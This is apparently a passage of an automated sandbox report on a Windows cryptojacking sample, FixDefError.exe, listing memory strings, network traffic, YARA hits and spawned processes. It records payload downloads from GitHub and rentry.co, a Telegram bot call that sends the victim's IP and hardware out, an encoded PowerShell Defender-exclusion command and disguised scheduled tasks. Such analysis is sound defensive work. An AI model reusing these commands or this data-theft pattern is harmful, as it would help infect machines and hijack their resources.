      Source: svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ETHMonsterM/ETHMonsterM/raw/main/cpm.exe
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys
      Source: powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com4
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.comD8
      Source: powershell.exe, 00000004.00000003.465541531.000000000544F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sys
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com4
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://render.githubusercontent.com
      Source: RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co
      Source: RegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlig/raw
      Source: RegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlxN
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co4
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
      Source: svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000043.00000003.318697799.000001CFFD845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
      Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322908815.000001CFFD83B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
      Source: svchost.exe, 00000043.00000003.316802969.000001CFFD84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: svhost.exe.1.drString found in binary or memory: https://xmrig.com/benchmark/%s
      Source: svhost.exe.1.drString found in binary or memory: https://xmrig.com/docs/algorithms
      Source: svhost.exe.1.drString found in binary or memory: https://xmrig.com/wizard
      Source: svhost.exe.1.drString found in binary or memory: https://xmrig.com/wizard%s
      Source: unknownDNS traffic detected: queries for: www.google.com
      Source: global trafficHTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1User-Agent: Mozilla/5.0Host: rentry.coConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001719155419&text=%F0%9F%94%B9New%20Worker:%0A%20%20%E2%8A%A2%20ID:%20171010202%0A%20%20%E2%8A%A2%20IP:%2084.17.52.9%0A%20%20%E2%8A%A2%20405464%0A%20%20%E2%88%9F%20Microsoft%20Windows%2010%20Pro%0A%F0%9F%94%B8Hardware:%0A%20%20%E2%8A%A2%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%20%20%E2%88%9F%20V33ZTS67 HTTP/1.1User-Agent: Mozilla/5.0Host: api.telegram.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/cpm.exe HTTP/1.1User-Agent: Mozilla/5.0Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys HTTP/1.1User-Agent: Mozilla/5.0Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/wnnrg.sys HTTP/1.1User-Agent: Mozilla/5.0Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/cpm.exe HTTP/1.1User-Agent: Mozilla/5.0Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1Host: rentry.co
      Source: global trafficHTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1User-Agent: Mozilla/5.0Host: rentry.coConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49685 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49686 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49687 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49688 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49689 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49690 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49692 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49695 version: TLS 1.2
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeWindow created: window name: CLIPBRDWNDCLASS

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Modifies the hosts file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: sslproxydump.pcap, type: PCAPMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
      Source: sslproxydump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Uses powercfg.exe to modify the power settings
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: sslproxydump.pcap, type: PCAPMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
      Source: sslproxydump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D89890_2_011D8989
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D16490_2_011D1649
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D79180_2_011D7918
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1E980_2_011D1E98
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D052D0_2_011D052D
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D073A0_2_011D073A
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D27B20_2_011D27B2
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D07EB0_2_011D07EB
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D06000_2_011D0600
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D06DD0_2_011D06DD
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D094F0_2_011D094F
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D08180_2_011D0818
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D08BC0_2_011D08BC
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D33080_2_011D3308
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D12500_2_011D1250
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D12400_2_011D1240
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D32F80_2_011D32F8
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D75340_2_011D7534
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D34B80_2_011D34B8
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D17C80_2_011D17C8
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D19030_2_011D1903
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D19B50_2_011D19B5
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D18000_2_011D1800
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1B5F0_2_011D1B5F
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1BAC0_2_011D1BAC
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D7C0E0_2_011D7C0E
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1C470_2_011D1C47
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1CD60_2_011D1CD6
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_084ED0080_2_084ED008
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_084ECFE60_2_084ECFE6
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F7C1D81_2_00F7C1D8
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F70BF01_2_00F70BF0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F76F9C1_2_00F76F9C
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F710C01_2_00F710C0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F7BA201_2_00F7BA20
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F77D901_2_00F77D90
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F7BD801_2_00F7BD80
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F7C5E81_2_00F7C5E8
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F728D01_2_00F728D0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F728C21_2_00F728C2
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F7CA401_2_00F7CA40
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F70B471_2_00F70B47
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F710B01_2_00F710B0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F733C81_2_00F733C8
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F733B91_2_00F733B9
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F779581_2_00F77958
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F77D801_2_00F77D80
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F77FAE1_2_00F77FAE
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02400B0056_2_02400B00
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02406CAC56_2_02406CAC
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_0240767056_2_02407670
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02401EC856_2_02401EC8
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_0240286056_2_02402860
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_024033A056_2_024033A0
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_0240766056_2_02407660
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_0240766956_2_02407669
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_0240352856_2_02403528
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_0240353856_2_02403538
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02401E5E56_2_02401E5E
      Source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImpulse.exe> vs FixDefError.exe
      Source: FixDefError.exe, 00000000.00000000.245216110.0000000000562000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameProgramInstaller.exeB vs FixDefError.exe
      Source: FixDefError.exe, 00000000.00000002.272580789.0000000000B39000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs FixDefError.exe
      Source: FixDefError.exeBinary or memory string: OriginalFilenameProgramInstaller.exeB vs FixDefError.exe
      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sysJump to behavior
      Source: svhost.exe.1.drStatic PE information: Number of sections : 11 > 10
      Source: Joe Sandbox ViewDropped File: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe A5ABDD354FCF673AD85A3A9D467B6184F46EF50FC300BA78C8ABABBDCABCA96D
      Source: ProgramStarter.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: FixDefError.exeReversingLabs: Detection: 25%
      Source: FixDefError.exeVirustotal: Detection: 39%
      Source: FixDefError.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\FixDefError.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\FixDefError.exe C:\Users\user\Desktop\FixDefError.exe
      Source: C:\Users\user\Desktop\FixDefError.exeProcess created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
